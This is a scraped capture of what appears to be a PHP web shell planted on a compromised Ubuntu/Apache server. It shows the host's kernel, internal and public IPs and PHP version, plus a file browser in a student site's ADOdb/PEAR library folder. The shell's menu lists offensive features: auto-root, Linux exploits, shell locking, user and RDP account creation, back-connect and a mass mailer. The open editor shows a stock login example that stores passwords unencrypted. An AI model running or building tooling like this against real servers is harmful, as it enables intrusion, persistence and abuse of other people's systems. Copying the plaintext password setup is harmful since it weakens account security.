Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.137.221.114
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
nitte /
libs /
adodb5 /
pear /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxr-xr-x
auth_adodb_example.php
751
B
-rwxr-xr-x
readme.Auth.txt
549
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth_adodb_example.php
<?php // NOTE: The ADOdb and PEAR directories MUST be in your PHP include_path! require_once "Auth/Auth.php"; function loginFunction() { ?> <form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>"> <input type="text" name="username"> <input type="password" name="password"> <input type="submit"> </form> <?php } $dsn = 'mysql://username:password@hostname/database'; // To use encrypted passwords, change cryptType to 'md5' $params = array('dsn' => $dsn, 'table' => 'auth', 'cryptType' => 'none', 'usernamecol' => 'username', 'passwordcol' => 'password'); $a = new Auth("ADOdb", $params, "loginFunction"); $a->start(); if ($a->getAuth()) { echo "Success"; // * The output of your site goes here. }
Close